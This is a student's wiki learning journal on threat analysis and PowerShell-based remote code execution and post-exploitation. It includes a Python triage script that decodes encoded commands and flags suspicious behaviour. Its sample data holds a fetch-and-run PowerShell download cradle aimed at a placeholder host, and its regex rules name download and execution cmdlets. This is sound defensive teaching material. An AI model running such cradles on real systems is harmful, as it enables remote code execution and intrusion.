10 Class 26: Learning Journal - VascoLucas01/cybersecurity-reading-notes GitHub Wiki

Introduction

[Date: 2023/06/16]

In this Class 26: Learning Journal, I am going to talk about the main ideas/concepts covered in the threat analysis lecture.

Today I Learned

Threat Analysis

Careers in Threat Analysis

Cyber threat analysts leverage skills and expertise of network engineering to mitigate and avoid cyberattacks on the organization or its employees.

  • Identify vulnerabilities
  • Study digital forensics
  • Conduct threat modeling
  • Simulate attacks, recommend defenses
  • Monitor networks

Avg. US salary

  • Entry level $84,000
  • Experienced $98,885-126,976

Cyber threat analysis is a process used by cybersecurity threat analysts to study and align a particular organization's defenses against its potential or realized cyber threats.

Threat analysis aims to answer:

  • What are we working on?
  • What are the things that can go wrong?
  • How do we deal with the problems that occur?
  • Did we do a good job?

Threat Modeling

Cyber threat modeling is a structured process used to determine potential security threats and weaknesses, assess risk levels per threat and implement mitigations against specific threats.

  • Optimally conducted during development of the app or system

Threat Modeling Methodologies

  • STRIDE
  • DREAD
  • PASTA
  • Trike
  • VAST
  • Attack Tree
  • CVSS
  • T-MAP
  • OCTAVE
  • Quantitative Threat Modeling Method

APTs

Stages of Exploitation

[image: Stages of Exploitation diagram]

Post-exploitation:

  • Privilege Escalation
  • Lateral movement

Remote Code Execution

T1059.001 (MITRE ATT&CK: Command and Scripting Interpreter: PowerShell)

Adversaries may abuse PowerShell commands and scripts for execution.

  • Executing commands
  • Leveraging encoded commands
  • Obfuscation (with or without encoding)
  • Downloading additional payloads
  • Launching additional processes
  • Examples: Start-Process cmdlet; Invoke-Command cmdlet
  • Required: administrator permissions to connect to remote systems
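As an added example (not part of this journal or the lecture), here is a small Python triage routine run over constructed process-creation command lines, in the shape a defender would see in Sysmon Event ID 1 or Security Event ID 4688 telemetry. It decodes the base64/UTF-16LE script behind -EncodedCommand and flags the behaviours listed above: encoded commands, hidden windows, download cradles, Invoke-Expression, the remote-execution cmdlets, and string-concatenation obfuscation that hides a cmdlet name from plain matching. The sample lines, the URL and the rule names are all constructed for the example.

```python
import base64
import re

# Constructed process-creation command lines (shape loosely modelled on Sysmon
# Event ID 1 / Security 4688 telemetry); made up for this example, not captured.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -Command Get-Service",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode(),
    'powershell.exe -Command "Invoke-Command -ComputerName srv01 -ScriptBlock {whoami}"',
    "powershell.exe -c \"$a='Inv'+'oke-Expr'+'ession'; & $a 'Write-Host hi'\"",
]

# Each rule is applied to the raw command line AND to the decoded script.
RULES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote_execution": re.compile(r"Invoke-Command|Start-Process", re.I),
    "string_concat_obfuscation": re.compile(r"'[^']{1,12}'\s*\+\s*'[^']{1,12}'\s*\+"),
}
# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc ...)
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: treat as no encoded payload

def analyze(cmdline):
    """Return the sorted list of finding names triggered by one command line."""
    decoded = decode_encoded_command(cmdline)
    findings = {"encoded_command"} if decoded is not None else set()
    for text in (cmdline, decoded or ""):
        for name, pattern in RULES.items():
            if pattern.search(text):
                findings.add(name)
    return sorted(findings)

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(analyze(event) or ["clean"], "<-", event[:60])
```

Note that the fourth sample is caught only by the concatenation heuristic: the cmdlet name never appears intact, which is why the page lists obfuscation "with or without encoding" as a separate concern from encoded commands.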

MS15-011: Vulnerability in Group Policy could allow remote code execution (February 10, 2015)

"PowerShell represents one of the most interesting and powerful languages for a pentesting purpose."

"... for us, as pentesters, PowerShell represents a powerful shell and scripting language which is present on our pentest targets and provides us, especially, with a powerful post-exploitation "tool/language" that can give us so much power and a very big attack surface/possibility." - Infosec Institute

Remote code execution (RCE) is a class of security vulnerabilities that allows a malicious actor to execute any code of their choice on a remote machine over a LAN, WAN, or the internet.

Post-exploitation includes the phases of operation once a victim's system has been compromised by the attacker.

Examples of post-exploitation frameworks: PowerShell Empire; Metasploit

PowerShell Empire

PowerShell Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture.

Empire implements the ability to run PowerShell agents without needing powershell.exe.

Includes rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz.

Supports adaptable communications to evade network detection.

Presented in an accessible framework.

Invoke-PsExec

Invoke-PsExec is a cmdlet that lets you execute PowerShell and batch/cmd.exe code asynchronously on target Windows computers, using PsExec.exe.

PsExec can be downloaded from the SysInternals suite on Microsoft's site.

Remember, a batch file ends in .bat and contains only non-PowerShell Windows (cmd.exe) commands, in the form of a script.